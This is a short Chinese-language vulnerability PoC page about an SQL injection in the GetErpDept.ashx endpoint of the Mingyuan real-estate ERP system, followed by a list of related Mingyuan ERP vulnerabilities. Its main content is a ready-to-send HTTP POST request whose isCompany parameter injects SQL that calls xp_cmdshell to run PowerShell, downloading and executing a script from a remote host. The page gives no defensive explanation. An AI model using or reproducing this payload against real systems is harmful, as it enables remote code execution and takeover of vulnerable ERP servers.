明源地产ERP GetErpDept 接口存在SQL注入

漏洞描述

PoC代码

POST /XmjdUI/Handle/GetErpDept.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0

isCompany=');exec master..xp_cmdshell "sqlps IEX ((new-object net.webclient).downloadstring('http://[REDACTED]/ikAXH'))"--

相关漏洞推荐

• POC 明源地产ERP系统 /XmjdUI/Handle/GetErpDept.ashx SQL 注入漏洞
• 明源地产ERP系统 /Hkbgl/PhoneWorkflow/Business/PhoneHandler.ashx SQL 注入漏洞
• POC 明源云ERP系统 GetErpDept.ashx 接口存在SQL注入漏洞
• 明源地产ERP /BUAdjust/DataRule/DataRule_XMLHTTP.aspx SQL 注入漏洞
• 明源地产ERP系统 /Kfxt/Service.asmx SQL 注入漏洞
• 明源地产ERP系统 /CgZtbWeb/VisitorWeb/VisitorWeb_XMLHTTP.aspx SQL 注入漏洞
• 明源地产ERP /MyWorkflowManagement/WebService/WFWebService.asmx 命令执行漏洞
• 明源地产ERP系统 WFWebService.asmx 存在反序列化远程代码执行漏洞
• 明源地产ERP系统 X-Forwarded-For SQL注入漏洞
• 明源地产ERP系统SQL注入漏洞